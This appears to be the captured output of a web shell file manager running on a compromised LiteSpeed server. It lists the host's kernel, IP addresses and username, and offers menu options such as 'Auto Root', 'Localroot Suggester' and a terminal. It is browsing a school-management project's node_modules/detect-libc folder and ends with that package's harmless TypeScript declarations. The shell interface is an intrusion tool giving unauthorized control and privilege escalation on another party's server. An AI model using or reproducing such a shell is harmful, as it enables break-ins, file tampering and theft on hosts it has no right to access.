Linux sg77.dns-private.com 5.14.0-503.40.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Mon May 5 06:06:04 EDT 2025 x86_64
LiteSpeed
Server IP : 135.181.230.13 & Your IP : 216.73.217.69
Domains :
Cant Read [ /etc/named.conf ]
User : pilasate
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
pilasate /
schoolms /
node_modules /
detect-libc /
Delete
Unzip
Name
Size
Permission
Date
Action
lib
[ DIR ]
drwxrwxrwx
2025-03-24 11:44
LICENSE
11.09
KB
-rw-rw-rw-
2025-03-24 11:44
README.md
3.14
KB
-rw-rw-rw-
2025-03-24 11:44
index.d.ts
436
B
-rw-rw-rw-
2025-03-24 11:44
package.json
1.08
KB
-rw-rw-rw-
2025-03-24 11:44
Save
Rename
// Copyright 2017 Lovell Fuller and others. // SPDX-License-Identifier: Apache-2.0 export const GLIBC: 'glibc'; export const MUSL: 'musl'; export function family(): Promise<string | null>; export function familySync(): string | null; export function isNonGlibcLinux(): Promise<boolean>; export function isNonGlibcLinuxSync(): boolean; export function version(): Promise<string | null>; export function versionSync(): string | null;